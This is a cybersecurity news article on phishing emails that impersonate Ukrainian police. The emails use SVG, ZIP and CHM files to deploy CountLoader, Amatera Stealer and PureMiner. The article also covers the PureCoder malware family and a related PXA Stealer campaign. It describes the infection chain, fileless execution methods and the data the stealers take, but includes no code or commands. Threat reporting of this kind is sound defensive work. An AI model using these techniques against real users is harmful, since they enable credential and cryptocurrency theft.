Phishing Campaign Exploits Ukrainian Agencies to Deliver Malware
Overview of Recent Attacks
A series of phishing attacks have emerged, specifically targeting individuals by impersonating Ukrainian government agencies. These campaigns utilize the CountLoader malware as a vector to install additional threats, namely Amatera Stealer and PureMiner.
The Mechanics of the Attack
Researchers from Fortinet’s FortiGuard Labs have identified that these phishing attempts are primarily disseminated through emails that contain malicious Scalable Vector Graphics (SVG) files. Yurren Wan, a cybersecurity analyst, noted that these SVG files are designed to deceive users into opening harmful attachments, thereby initiating successive stages of the attack.
In the identified attack sequence, once the SVG file is opened, it triggers the downloading of a password-protected ZIP archive. Inside this ZIP file is a Compiled HTML Help (CHM) file. When users launch the CHM file, it sets off a chain reaction that eventually leads to the activation of CountLoader. These phishing emails often claim to originate from the National Police of Ukraine, adding an additional layer of credibility to the deception.
What is CountLoader?
CountLoader has been a focal point in several cybersecurity analyses, including a recent report by Silent Push. It’s capable of deploying various payloads such as Cobalt Strike, AdaptixC2, and PureHVNC RAT. In this specific attack vector, CountLoader is crucial for transmitting Amatera Stealer, a variant of ACRStealer, alongside PureMiner—a sophisticated .NET cryptocurrency mining malware.
Malware Suite from PureCoder
It’s important to highlight the malicious capabilities of both PureHVNC RAT and PureMiner, which belong to a broader suite of malware created by the threat actor known as PureCoder. Other notable products from this malware family include:
- PureCrypter: A crypter targeting Native and .NET applications.
- PureRAT (also referred to as ResolverRAT): An upgraded version of PureHVNC RAT.
- PureLogs: Designed for information theft and logging.
- BlueLoader: Acts as a botnet facilitating remote payload downloads and execution.
- PureClipper: A piece of malware that substitutes cryptocurrency addresses copied to the clipboard, redirecting transactions to wallets controlled by attackers.
Fileless Threats and Execution Techniques
According to Fortinet, both Amatera Stealer and PureMiner function as fileless threats. This means they are executed in memory rather than relying on traditional file systems. Specifically, they utilize .NET Ahead-of-Time (AOT) compilation, process hollowing, or are loaded directly into memory via a technique known as PythonMemoryModule.
Amatera Stealer’s Capabilities
Once activated, Amatera Stealer is adept at harvesting sensitive system information. It not only collects files based on a predefined list of extensions but also siphons data from popular browsers like Chromium and Gecko. Additionally, it targets applications such as Steam, Telegram, FileZilla, and various cryptocurrency wallets, amplifying the risk for those holding digital assets.
The Role of SVG Files
This phishing campaign effectively highlights how an SVG file can act as a deceptive substitute for HTML files, initiating an infection chain that poses serious risks. Fortinet noted that the attackers specifically targeted Ukrainian government entities, relying on SVG-embedded HTML code to redirect victims to a malicious download site.
Connections to Other Threat Groups
Recent findings by Huntress have uncovered additional phishing efforts, specifically attributed to a Vietnamese-speaking threat group. This group also uses phishing emails—this time masquerading as copyright infringement notices—to persuade recipients into launching ZIP archives that install PXA Stealer, which subsequently progresses to deploy PureRAT.
Evolving Threat Landscape
Security researcher James Northey commented on the evolutionary aspects of these campaigns, highlighting the methodical progression from basic phishing techniques to complex infection chains. He remarked on the sophistication of the final payload, PureRAT, which functions as a highly modular backdoor, granting malicious actors extensive control over compromised systems.
The evolution from rudimentary techniques to sophisticated malware like PureRAT reflects not only persistence but also signals the growth of experienced operators within the cyber criminal landscape.
